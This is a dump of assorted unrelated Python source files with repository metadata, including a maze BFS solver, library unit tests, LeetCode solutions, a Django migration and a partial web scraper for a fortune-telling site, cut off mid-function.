9148c4700e17b1eaf522d5d491ca64143dd99ec5 | 4382c60f18aba351a2e7cdab7ce2793c2d27717c | /Algorithm 190821 holefly/maze.py | 12f18e9fb2494b562c1a9664481cda999c37fabd | [] | no_license | vxda7/pycharm | e550b1db4cabe1a0fa03e140f33b028ef08bd4cb | ce29f682a923875b62a8c7c0102790eef11ab156 | refs/heads/master | 2020-07-03T11:27:27.807096 | 2019-11-15T08:50:32 | 2019-11-15T08:50:32 | 201,891,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,261 | py | import sys
sys.stdin = open("sample_input.txt", "r")
def find(scol, srow):
global maze
global N
dl = [0, 1, 0, -1]
dr = [1, 0, -1, 0]
queue = []
visited = [[0] * N for _ in range(N)]
queue.append([scol, srow])
visited[scol][srow] = 1
while len(queue) != 0:
n = queue.pop(0)
for i in range(4):
ndl = n[0] + dl[i]
ndr = n[1] + dr[i]
if ndl >= 0 and ndl < N and ndr >= 0 and ndr < N: # 미로안에 있는가
if maze[ndl][ndr] == 3: # 3이면 반환
return visited[n[0]][n[1]] - 1
elif maze[ndl][ndr] != 1 and visited[ndl][ndr] == 0: # 1이 아니고 방문을 안했다면
queue.append([ndl, ndr])
visited[ndl][ndr] += 1 + visited[n[0]][n[1]]
return 0
# def bfs(i, j , N):
# global maze
# di = [0, 1, 0, -1]
# dj = [1, 0, -1, 0]
# # 초기화
# q=[] #큐생성
# visited = [[0]*N for _ in range(N)] #visited 생성
# q.append([i, j]) # 시작점 인큐
# visited[i][j] = 1 # 시작점 방문표시
#
# # 탐색
# while len(q) != 0: # 큐가 비어있지 않으면 반복
# n = q.pop(0) # 디큐
# i, j = n[0], n[1]
# if maze[i][j] == 3: # visit()
# print(visited)
# return visited[i][j] - 2
# # i, j에 인접하고 방문하지 않은 칸을 인큐
# for k in range(4):
# ni = i + di[k]
# nj = j + dj[k]
# if ni >= 0 and ni < N and nj >= 0 and nj < N: # 미로를 벗어나지 않고
# if maze[ni][nj] != 1 and visited[ni][nj] == 0: # 벽이아니고, 방문하지 않은 칸이면
# q.append([ni, nj]) # 인큐
# visited[ni][nj] += 1 + visited[i][j] # 방문 표시
#
# return 0
test_case = int(input())
for case in range(1, test_case + 1):
N = int(input())
maze = []
for i in range(N):
get = list(map(int,list(input())))
maze.append(get)
if 2 in get:
scol = i
srow = get.index(2)
result = find(scol, srow)
# result = bfs(scol, srow, N)
print("#{} {}".format(case, result))
| [
"vxda77@gmail.com"
] | vxda77@gmail.com |
a7ef82ec99d2dabda3ce6ccfe98cbfd0a087bfa6 | 61f9553eedc2ec936ea87f06da5b986091e3b8ff | /workspace/buildout-cache/eggs/plone.scale-1.3.2-py2.7.egg/plone/scale/tests/test_storage.py | 21725c874ed3e430c1fe7398bda865efc9f11528 | [] | no_license | gruhter/gso | 47880b055455cc99d63eec72498048c857e7831b | c0eb949f8a06aab6b97329d51a6d046e2fc0a653 | refs/heads/master | 2016-09-01T18:28:05.589620 | 2015-05-14T19:38:18 | 2015-05-14T19:38:18 | 35,579,298 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,910 | py | from unittest import TestCase
from operator import itemgetter, setitem, delitem
class AnnotationStorageTests(TestCase):
@property
def storage(self):
from plone.scale.storage import AnnotationStorage
storage = AnnotationStorage(None)
storage.modified = lambda: 42
storage.storage = {}
return storage
def factory(self, **kw):
return 'some data', 'png', (42, 23)
def testInterface(self):
from plone.scale.storage import IImageScaleStorage
storage = self.storage
self.failUnless(IImageScaleStorage.providedBy(storage))
def testScaleForNonExistingScaleWithCreation(self):
storage = self.storage
scale = storage.scale(factory=self.factory, foo=23, bar=42)
self.failUnless('uid' in scale)
self.failUnless('key' in scale)
self.assertEqual(scale['data'], 'some data')
self.assertEqual(scale['width'], 42)
self.assertEqual(scale['height'], 23)
self.assertEqual(scale['mimetype'], 'image/png')
def testScaleForNonExistingScaleWithoutCreation(self):
storage = self.storage
scale = storage.scale(foo=23, bar=42)
self.assertEqual(scale, None)
def testScaleForExistingScale(self):
storage = self.storage
scale1 = storage.scale(factory=self.factory, foo=23, bar=42)
scale2 = storage.scale(factory=self.factory, bar=42, foo=23)
self.failUnless(scale1 is scale2)
self.assertEqual(len(storage), 2)
def testScaleForSimilarScales(self):
storage = self.storage
scale1 = storage.scale(factory=self.factory, foo=23, bar=42)
scale2 = storage.scale(factory=self.factory, bar=42, foo=23, hurz='!')
self.failIf(scale1 is scale2)
self.assertEqual(len(storage), 4)
def testGetItem(self):
storage = self.storage
scale = storage.scale(factory=self.factory, foo=23, bar=42)
uid = scale['uid']
scale = storage[uid]
self.failUnless('uid' in scale)
self.failUnless('key' in scale)
self.assertEqual(scale['data'], 'some data')
self.assertEqual(scale['width'], 42)
self.assertEqual(scale['height'], 23)
self.assertEqual(scale['mimetype'], 'image/png')
def testGetUnknownItem(self):
storage = self.storage
self.assertRaises(KeyError, itemgetter('foo'), storage)
def testSetItemNotAllowed(self):
storage = self.storage
self.assertRaises(RuntimeError, setitem, storage, 'key', None)
def testIterateWithoutAnnotations(self):
storage = self.storage
self.assertEqual(list(storage), [])
def testIterate(self):
storage = self.storage
storage.storage.update(one=None, two=None)
generator = iter(storage)
self.assertEqual(set(generator), set(['one', 'two']))
def testKeys(self):
storage = self.storage
storage.storage.update(one=None, two=None)
self.failUnless(isinstance(storage.keys(), list))
self.assertEqual(set(storage.keys()), set(['one', 'two']))
def testNegativeHasKey(self):
storage = self.storage
self.assertEqual(storage.has_key('one'), False)
def testPositiveHasKey(self):
storage = self.storage
storage.storage.update(one=None)
self.assertEqual(storage.has_key('one'), True)
def testDeleteNonExistingItem(self):
storage = self.storage
self.assertRaises(KeyError, delitem, storage, 'foo')
def testDeleteRemovesItemAndIndex(self):
storage = self.storage
scale = storage.scale(factory=self.factory, foo=23, bar=42)
self.assertEqual(len(storage), 2)
del storage[scale['uid']]
self.assertEqual(len(storage), 0)
def test_suite():
from unittest import defaultTestLoader
return defaultTestLoader.loadTestsFromName(__name__)
| [
"gso@abv.bg"
] | gso@abv.bg |
1e69296fbfffb99ccc5b1dbd9d7b72ffe89f647c | 0c1cf007f9d5d00ceefaf7be57e3f81c1c49fb11 | /lightning_asr/vocabs/vocab.py | 17fabbd392c30c01608d1d345c8c6597f8a21c1f | [
"MIT"
] | permissive | sooftware/lightning-asr | f345f34dce132a6ccdb393b74c1f9bf0e1ccaac8 | 3b4d8222fad15c90a8c9b44ecacd67f309b34124 | refs/heads/main | 2023-04-30T17:46:21.737471 | 2021-05-19T11:56:33 | 2021-05-19T11:56:33 | 357,467,261 | 16 | 5 | MIT | 2021-05-12T14:22:05 | 2021-04-13T07:46:44 | Python | UTF-8 | Python | false | false | 1,539 | py | # MIT License
#
# Copyright (c) 2021 Soohwan Kim
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
class Vocabulary(object):
"""
Note:
Do not use this class directly, use one of the sub classes.
"""
def __init__(self, *args, **kwargs):
self.sos_id = None
self.eos_id = None
self.pad_id = None
self.blank_id = None
self.vocab_size = None
def __len__(self):
return self.vocab_size
def label_to_string(self, labels):
raise NotImplementedError
| [
"sooftware@Soohwanui-MacBookPro.local"
] | sooftware@Soohwanui-MacBookPro.local |
79fef1c980fcdf38f5a02fdcb06e729cab57c0de | e5baa5ba65c5cb80b38203b28c064a475aa63693 | /WebContent/mod/topic/new_topic.py | 4897608329e28377dddb01bf792972cf897abd83 | [] | no_license | yxxcrtd/jitar2012 | bbe00b1eb2e505400dcfec396201752c3888199c | ccae07ff44a3cb9dc3d0b75673cbca699fa66b80 | refs/heads/master | 2020-05-31T15:26:40.107486 | 2019-06-05T08:05:22 | 2019-06-05T08:05:22 | 190,352,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,552 | py | #encoding=utf-8
from java.util import Date
from java.util import HashMap
from java.lang import String
from common_data import CommonData
from cn.edustar.jitar.pojos import PlugInTopic
class new_topic(CommonData):
def __init__(self):
CommonData.__init__(self)
def execute(self):
if self.parentGuid == "" or self.parentType == "":
self.addActionError(u"无效的访问。")
return self.ERROR
if self.loginUser == None:
self.addActionError(u"请先登录。")
return self.LOGIN
self.returl = self.params.safeGetStringParam("returl")
if request.getMethod() == "POST":
return self.save_or_update()
map = HashMap()
map.put("SiteUrl", self.pageFrameService.getSiteUrl())
map.put("UserMgrUrl", self.pageFrameService.getUserMgrUrl())
map.put("loginUser", self.loginUser)
map.put("head_nav", "special_subject")
map.put("returl", self.returl)
pagedata = self.pageFrameService.transformTemplate(map, "/WEB-INF/mod/topic/new_topic.ftl")
page_frame = self.pageFrameService.getFramePage(self.parentGuid, self.parentType)
page_frame = page_frame.replace("[placeholder_content]", pagedata)
page_frame = page_frame.replace("[placeholder_title]", u"发起讨论")
self.writeToResponse(page_frame)
def save_or_update(self):
t_title = self.params.safeGetStringParam("ttitle")
t_content = self.params.safeGetStringParam("tcontent")
if t_title == "" or t_content == "":
self.addActionError(u"请输入讨论标题或者讨论内容。")
return self.ERROR
plugInTopic = PlugInTopic()
plugInTopic.setTitle(t_title)
plugInTopic.setCreateDate(Date())
plugInTopic.setCreateUserId(self.loginUser.userId)
plugInTopic.setCreateUserName(self.loginUser.trueName)
plugInTopic.setTopicContent(t_content)
plugInTopic.setAddIp(self.get_client_ip())
plugInTopic.setParentGuid(self.parentGuid)
plugInTopic.setParentObjectType(self.parentType)
self.topic_svc = __spring__.getBean("plugInTopicService")
self.topic_svc.addPluginTopic(plugInTopic)
if self.returl == "":
self.addActionMessage(u"发布成功。")
return self.SUCCESS
else:
response.sendRedirect(self.returl)
| [
"yxxcrtd@gmail.com"
] | yxxcrtd@gmail.com |
21330b565fa24100c359cf64c8463de47eb289ee | 0bc0db1edc610c9f08261c777d06cb1be4b7a524 | /lgp/pythonSpider/ch1/2sequence.py | 456331e43c37d521807a7df0690c84becd95827e | [] | no_license | danpianji/python3.7 | 9bc7f9a765ec76d7d4c5fb413dcdada4f9e8f510 | f66bc7139f9441583b1043d3da11597987e3fbc0 | refs/heads/master | 2020-12-28T14:49:41.410708 | 2019-05-19T10:13:32 | 2019-05-19T10:13:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | # -*- coding: UTF-8 -*-
#序列化操作
try:
import cPickle as pickle
except:
import pickle
dict = {"name":"lgp", "age":20, "sex":'M'}
str = pickle.dumps(dict)
print str
dict2 = pickle.loads(str)
print dict2
#也可以将序列化的字符串写入文件存储 | [
"liguangpei1@163.com"
] | liguangpei1@163.com |
bcb656a6cc79492be26ef9deb258a8808e3aa15d | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /58DYAThA2dxnAsMpL_16.py | 61ef3bf2cf1af1f68ed181455ccc260b229bfe59 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | """
Create a function which returns a list of _booleans_ , from a given number.
Iterating through the number one digit at a time, append `True` if the digit
is 1 and `False` if it is 0.
### Examples
integer_boolean("100101") ➞ [True, False, False, True, False, True]
integer_boolean("10") ➞ [True, False]
integer_boolean("001") ➞ [False, False, True]
### Notes
Expect numbers with 0 and 1 only.
"""
def integer_boolean(n):
A=[]
for i in n:
if (i=="0"):
A.append(False)
else:
A.append(True)
return A
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
a01572aa4eb23712a34425bf2c293005f7247ea3 | 304e75224229786ba64c6ef2124007c305019b23 | /src/easy/test_make_two_arrays_equal_by_reversing_sub_arrays.py | 00f2070eb7ce459d4e058cc5a5255feacc815c15 | [] | no_license | Takuma-Ikeda/other-LeetCode | 9179a8100e07d56138fd3f3f626951195e285da2 | 499616d07011bee730b9967e9861e341e62d606d | refs/heads/master | 2023-04-14T06:09:35.341039 | 2023-04-10T02:29:18 | 2023-04-10T02:29:18 | 226,260,312 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 897 | py | import unittest
from answer.make_two_arrays_equal_by_reversing_sub_arrays import Solution
class TestSolution(unittest.TestCase):
def setUp(self):
self.target = [
[1, 2, 3, 4],
[7],
[1, 12],
[3, 7, 9],
[1, 1, 1, 1, 1],
]
self.arr = [
[2, 4, 1, 3],
[7],
[12, 1],
[3, 7, 11],
[1, 1, 1, 1, 1],
]
self.answers = [
True,
True,
True,
False,
True,
]
def test_solution(self):
for i in range(len(self.answers)):
print('----- TEST NO.%i START -----' % i)
s = Solution()
result = s.canBeEqual(self.target[i], self.arr[i])
self.assertEqual(self.answers[i], result)
if __name__ == "__main__":
unittest.main()
| [
"el.programdear@gmail.com"
] | el.programdear@gmail.com |
d0d9bc0c393953fc4d66a087de4a0606ec41154a | 558cc75ea0e093f0b27197654bd0162cce688e03 | /social_network/migrations/0026_auto_20200421_1257.py | f3eb7084107ea6ba18e1d6df8806d5a2e038e20b | [] | no_license | seniordev0425/Python-Rafflee | 89766de8bad96ca919a34df2f0820d24b9258808 | 37da2e7a37a0b0b5332ff036f80814598ed57c0b | refs/heads/master | 2022-11-26T20:46:32.082517 | 2020-08-07T03:01:21 | 2020-08-07T03:01:21 | 285,723,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # Generated by Django 2.2.12 on 2020-04-21 12:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('social_network', '0025_auto_20200421_1249'),
]
operations = [
migrations.AlterField(
model_name='socialaction',
name='twitter_follow_type',
field=models.CharField(choices=[('user_id', 'USER_ID'), ('screen_name', 'SCREEN_NAME')], max_length=15, null=True),
),
]
| [
"seniordev0425@gmail.com"
] | seniordev0425@gmail.com |
1966df5213bd6122c4be02f75e2f4bcc6599ffe1 | 21962ae2b724f4679683dab3f30306f59e6da834 | /pylastests/test_header.py | 49e238a807790d4374c6b55a4018de7aed87d511 | [
"BSD-3-Clause"
] | permissive | GeolearnAI/pylas | 7b54178809ee6f7a60525f6ad85ad58385b99310 | 7a5bbada702d927e4f78d5c2883dcc98f808d831 | refs/heads/master | 2022-09-18T11:28:45.593005 | 2020-06-06T12:23:58 | 2020-06-06T12:23:58 | 278,429,549 | 0 | 0 | null | 2020-07-09T17:32:31 | 2020-07-09T17:32:31 | null | UTF-8 | Python | false | false | 3,146 | py | import pylas
from pylastests import test_common
all_las_but_1_4 = test_common.all_las_but_1_4
def test_number_of_points_return_is_updated(all_las_but_1_4):
las = all_las_but_1_4
nb_points = len(las.points_data)
nb_slice = 3
r = las.return_number
for i in reversed(range(nb_slice)):
r[i * (nb_points // nb_slice): (i + 1) * (nb_points // nb_slice)] = i
las.return_number = r
las = test_common.write_then_read_again(las)
assert (
tuple(las.header.number_of_points_by_return[:nb_slice])
== (nb_points // nb_slice,) * nb_slice
)
assert tuple(las.header.number_of_points_by_return[nb_slice:]) == (0,) * (
len(las.header.number_of_points_by_return) - nb_slice
)
def test_nb_points_return_1_4():
las = pylas.read(test_common.test1_4_las)
r = las.return_number
for i in reversed(range(15)):
r[i] = i
r[14:] = 15
las.return_number = r
las = test_common.write_then_read_again(las)
assert tuple(las.header.number_of_points_by_return) == ((1,) * 14) + (
len(las.points_data) - 14,
)
def test_header_copy():
import copy
las = pylas.read(test_common.simple_las)
header_copy = copy.copy(las.header)
assert header_copy.point_format_id == las.header.point_format_id
assert header_copy.version == las.header.version
header_copy.point_format_id = 0
assert header_copy.point_format_id != las.header.point_format_id
assert header_copy.version == las.header.version
def test_set_uuid():
import uuid
las = pylas.read(test_common.simple_las)
u = uuid.uuid4()
las.header.uuid = u
las = test_common.write_then_read_again(las)
assert las.header.uuid == u
def test_set_offsets():
header = pylas.headers.HeaderFactory.new('1.2')
header.offsets = [0.5, 0.6, 0.7]
assert 0.5 == header.x_offset
assert 0.6 == header.y_offset
assert 0.7 == header.z_offset
assert [0.5, 0.6, 0.7] == list(header.offsets)
def test_set_scales():
header = pylas.headers.HeaderFactory.new('1.2')
header.scales = [0.001, 0.001, 0.01]
assert 0.001 == header.x_scale
assert 0.001 == header.y_scale
assert 0.01 == header.z_scale
assert [0.001, 0.001, 0.01] == list(header.scales)
def test_set_maxs():
header = pylas.headers.HeaderFactory.new('1.2')
values = [42.0, 1337.42, 553.3]
header.maxs = values
assert values[0] == header.x_max
assert values[1] == header.y_max
assert values[2] == header.z_max
assert values == list(header.maxs)
def test_set_mins():
header = pylas.headers.HeaderFactory.new('1.2')
values = [42.0, 1337.42, 553.3]
header.mins = values
assert values[0] == header.x_min
assert values[1] == header.y_min
assert values[2] == header.z_min
assert values == list(header.mins)
def test_point_count_stays_synchronized():
las = pylas.read(test_common.simple_las)
assert las.header.point_count == len(las.points_data)
las.points = las.points[:120]
assert 120 == las.header.point_count
assert las.header.point_count == len(las.points_data)
| [
"thomas.montaigu@laposte.net"
] | thomas.montaigu@laposte.net |
172fd6a6f6a7e501a7de91d45c12f74794c95b5f | 9afbb6993450d1e0c3bae68e86844bd06d4419ee | /gui/help1.py | e002f49a08124bc75ba58494211b2b47d2e5ac89 | [] | no_license | Jigar710/Python_Programs | 6f331caac30878655d4cca4ad97d4214c0262088 | 714a6306487eb6712f32ccb51b6a2407a81873fa | refs/heads/main | 2023-02-25T12:24:44.874199 | 2021-01-28T15:43:24 | 2021-01-28T15:43:24 | 332,869,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28 | py | import tkinter
help(tkinter) | [
"jigar.shekhat.777@gmail.com"
] | jigar.shekhat.777@gmail.com |
905af0071c737e9ee131d302fd623eb668532ec3 | ef3a7391b0a5c5d8e276355e97cbe4de621d500c | /venv/Lib/site-packages/spacy/tests/lang/en/test_text.py | a7ebde9898add7b47514cf89f800b00e9f28a74b | [
"Apache-2.0"
] | permissive | countBMB/BenjiRepo | 143f6da5d198ea6f06404b4559e1f4528b71b3eb | 79d882263baaf2a11654ca67d2e5593074d36dfa | refs/heads/master | 2022-12-11T07:37:04.807143 | 2019-12-25T11:26:29 | 2019-12-25T11:26:29 | 230,090,428 | 1 | 1 | Apache-2.0 | 2022-12-08T03:21:09 | 2019-12-25T11:05:59 | Python | UTF-8 | Python | false | false | 1,898 | py | # coding: utf-8
from __future__ import unicode_literals
import pytest
from spacy.lang.en.lex_attrs import like_num
def test_en_tokenizer_handles_long_text(en_tokenizer):
text = """Tributes pour in for late British Labour Party leader
Tributes poured in from around the world Thursday
to the late Labour Party leader John Smith, who died earlier from a massive
heart attack aged 55.
In Washington, the US State Department issued a statement regretting "the
untimely death" of the rapier-tongued Scottish barrister and parliamentarian.
"Mr. Smith, throughout his distinguished"""
tokens = en_tokenizer(text)
assert len(tokens) == 76
@pytest.mark.parametrize(
"text,length",
[
("The U.S. Army likes Shock and Awe.", 8),
("U.N. regulations are not a part of their concern.", 10),
("“Isn't it?”", 6),
("""Yes! "I'd rather have a walk", Ms. Comble sighed. """, 15),
("""'Me too!', Mr. P. Delaware cried. """, 11),
("They ran about 10km.", 6),
pytest.param(
"But then the 6,000-year ice age came...", 10, marks=pytest.mark.xfail()
),
],
)
def test_en_tokenizer_handles_cnts(en_tokenizer, text, length):
tokens = en_tokenizer(text)
assert len(tokens) == length
@pytest.mark.parametrize(
"text,match",
[
("10", True),
("1", True),
("10,000", True),
("10,00", True),
("999.0", True),
("one", True),
("two", True),
("billion", True),
("dog", False),
(",", False),
("1/2", True),
],
)
def test_lex_attrs_like_number(en_tokenizer, text, match):
tokens = en_tokenizer(text)
assert len(tokens) == 1
assert tokens[0].like_num == match
@pytest.mark.parametrize("word", ["eleven"])
def test_en_lex_attrs_capitals(word):
assert like_num(word)
assert like_num(word.upper())
| [
"bengmen92@gmail.com"
] | bengmen92@gmail.com |
834f1bf7004dbffd444b639a44a6dd308b70ec95 | 796b8a166edc28dd04d23244b698742a607bc23f | /Leetcode/140. Word Break II.py | f899b9fa0812e2d472653987c6dc2e7d94fa7583 | [] | no_license | brlala/Educative-Grokking-Coding-Exercise | 54f18309d89784fbf9452b5b609cd30e54378c46 | e50dc0642f087f37ab3234390be3d8a0ed48fe62 | refs/heads/master | 2023-04-22T07:34:37.360508 | 2021-05-02T11:16:47 | 2021-05-02T11:16:47 | 299,006,488 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 789 | py | class Solution:
def wordBreak(self, s: str, wordDict: list[str]) -> list[str]:
"""
https://leetcode.com/problems/word-break-ii/discuss/44368/Python-easy-to-understand-solutions-(memorization%2BDFS-DP%2BDFS)
"""
memo = {}
return self.dfs(s, set(wordDict), memo)
def dfs(self, s, wordDict, memo):
if s in memo:
return memo[s]
if not s:
return [""]
res = []
for i in range(1, len(s) + 1):
if s[:i] in wordDict:
for word in self.dfs(s[i:], wordDict, memo):
res.append(s[:i] + (" " if word else "") + word)
memo[s] = res
return res
a = Solution()
a.wordBreak(s="catsanddog", wordDict=["cat", "cats", "and", "sand", "dog"])
| [
"liheng@pand.ai"
] | liheng@pand.ai |
e2c433cdf668923a5392e033234ce436dff666cc | 5c05a9a520ddd07f92759fe4220ddec5ffe01ab2 | /python网络数据采集/my_爬虫_进阶_之路/scrapy框架/my_spiders/电商项目集合/my_flask_server/buyiju_spider.py | 67cb1e2fe1f41bb1b263d3bde71ec90ed078215e | [] | no_license | sdpku/python | c005970827377615b3f9f1ec2bfb752972bc5e99 | 0363316911aa2ed89e5499b5a6dd2928867ee3bd | refs/heads/master | 2020-06-26T06:57:44.171835 | 2019-07-29T09:27:17 | 2019-07-29T09:27:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,536 | py | # coding:utf-8
'''
@author = super_fazai
@File : buyiju_spider.py
@connect : superonesfazai@gmail.com
'''
"""
卜易居 spider(https://m.buyiju.com)
"""
from settings import (
MY_SPIDER_LOGS_PATH,
IP_POOL_TYPE,)
from article_spider import (
modify_body_p_typesetting,
modify_body_img_centering,)
from fzutils.spider.selector import async_parse_field
from fzutils.exceptions import catch_exceptions_with_class_logger
from fzutils.spider.async_always import *
class BuYiJuSpider(AsyncCrawler):
def __init__(self, logger=None):
AsyncCrawler.__init__(
self,
ip_pool_type=IP_POOL_TYPE,
log_print=True,
logger=logger,
log_save_path=MY_SPIDER_LOGS_PATH + '/buyiju/_/',)
self.num_retries = 6
self.parser_obj_dict = self.get_parser_obj_dict()
async def _fck_run(self):
"""
main
:return:
"""
# self.test()
# ** 姓名打分
res = await self.name_scoring(
surname='吕',
name='布',)
# ** 测字算命
# res = await self.word_and_fortune_telling(two_words='你好')
# ** 生日算命
# res = await self.birthday_fortune_telling(month=12, day=25)
# ** 手机号码测吉凶
# res = await self.phone_number_for_good_or_bad_luck(phone_num=18796571279)
# ** 车牌号码测吉凶
# res = await self.license_plate_num_for_good_or_bad(
# province='京',
# city_num='A',
# num='66666')
# ** 姓名缘分配对
# res = await self.distribution_pairs_of_names(
# name1='吕布',
# name2='貂蝉')
# ** 星座配对
# res = await self.constellation_pairing(
# name1='处女座',
# name2='摩羯座')
# ** 抽签算命
# 财神灵签
# res = await self.fortune_telling_by_lot(lot_type='cs')
# 观音灵签
# res = await self.fortune_telling_by_lot(lot_type='gy')
# 佛祖灵签
# res = await self.fortune_telling_by_lot(lot_type='fz')
# 月老灵签
# res = await self.fortune_telling_by_lot(lot_type='yl')
# 关帝灵签
# res = await self.fortune_telling_by_lot(lot_type='gd')
# 黄大仙灵签
# res = await self.fortune_telling_by_lot(lot_type='hdx')
# 吕祖灵签
# res = await self.fortune_telling_by_lot(lot_type='lz')
# 天后妈祖灵签
# res = await self.fortune_telling_by_lot(lot_type='mz')
# 地藏王灵签
# res = await self.fortune_telling_by_lot(lot_type='dzw')
# 易经64卦灵签
# res = await self.fortune_telling_by_lot(lot_type='yj')
# 太上老君灵签
# res = await self.fortune_telling_by_lot(lot_type='tslj')
# pprint(res)
async def constellation_pairing(self, name1: str, name2: str) -> dict:
"""
星座配对
:param name1:
:param name2:
:return:
"""
assert name1 != '' and name2 != '', 'name1 or name2其一为空值'
headers = await self.get_random_phone_headers()
headers.update({
'Origin': 'https://m.buyiju.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'https://m.buyiju.com/peidui/xzpd.php',
})
data = {
'xz1': name1,
'xz2': name2,
'submit': '开始测试',
}
body = await unblock_request(
method='post',
url='https://m.buyiju.com/peidui/xzpd.php',
headers=headers,
data=data,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg,)
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['constellation_pairing']['content'],
target_obj=body,
logger=self.lg, )
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_constellation_pairing_content(content=content)
print(content)
return {
'res': content,
}
async def distribution_pairs_of_names(self, name1: str, name2: str) -> dict:
"""
姓名缘分配对
:param name1:
:param name2:
:return:
"""
assert name1 != '' and name2 != '', \
'name1 or name2其一为空值'
headers = await self.get_random_phone_headers()
headers.update({
'Origin': 'https://m.buyiju.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'https://m.buyiju.com/peidui/xmyf.php',
})
data = {
'cname1': name1,
'cname2': name2,
'submit': '开始测试',
}
body = await unblock_request(
method='post',
url='https://m.buyiju.com/peidui/xmyf.php',
headers=headers,
data=data,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg,)
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['distribution_pairs_of_names']['content'],
target_obj=body,
logger=self.lg, )
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_distribution_pairs_of_names_content(content=content)
print(content)
return {
'res': content,
}
async def license_plate_num_for_good_or_bad(self, province: str, city_num: str, num :str):
"""
车牌测吉凶
:param province:
:param city_num:
:param num:
:return:
"""
assert province != '' and city_num != '' and num != '',\
'province or city_num or num 其一为空值'
headers = await self.get_random_phone_headers()
headers.update({
'Origin': 'https://m.buyiju.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'https://m.buyiju.com/cm/chepai/',
})
data = {
'sheng': province,
'shi': city_num,
'czsm': num,
'action': 'test'
}
body = await unblock_request(
method='post',
url='https://m.buyiju.com/cm/chepai/',
headers=headers,
data=data,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg, )
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['license_plate_num_for_good_or_bad']['content'],
target_obj=body,
logger=self.lg, )
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_license_plate_num_for_good_or_bad_content(content=content)
print(content)
return {
'res': content,
}
async def phone_number_for_good_or_bad_luck(self, phone_num: int):
"""
手机号码测吉凶
:param phone_num:
:return:
"""
headers = await self.get_random_phone_headers()
headers.update({
'Origin': 'https://m.buyiju.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'https://m.buyiju.com/shouji/',
})
data = {
'sjhao': str(phone_num),
'action': 'test'
}
body = await unblock_request(
method='post',
url='https://m.buyiju.com/shouji/',
headers=headers,
data=data,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg, )
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['phone_number_for_good_or_bad_luck']['content'],
target_obj=body,
logger=self.lg, )
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_phone_number_for_good_or_bad_luck_content(content=content)
print(content)
return {
'res': content,
}
async def birthday_fortune_telling(self, month: int, day: int) -> dict:
"""
生日算命
:return:
"""
headers = await self.get_random_phone_headers()
headers.update({
'Referer': 'https://m.buyiju.com/birth/shu/',
})
body = await unblock_request(
url='https://m.buyiju.com/birth/shu/{month}-{day}.html'.format(month=month, day=day),
headers=headers,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg, )
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['birthday_fortune_telling']['content'],
target_obj=body,
logger=self.lg, )
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_birthday_fortune_telling_content(content=content)
print(content)
return {
'res': content,
}
async def get_lot_some_params(self, lot_type: str) -> tuple:
"""
得到抽签动态参数
:param lot_type:
:return:
"""
assert lot_type != '', 'lot_type != ""'
base_referer = 'https://m.buyiju.com/{}/'
base_url = 'https://m.buyiju.com/{}/'
base_referer2 = 'https://m.buyiju.com/chouqian/{}/'
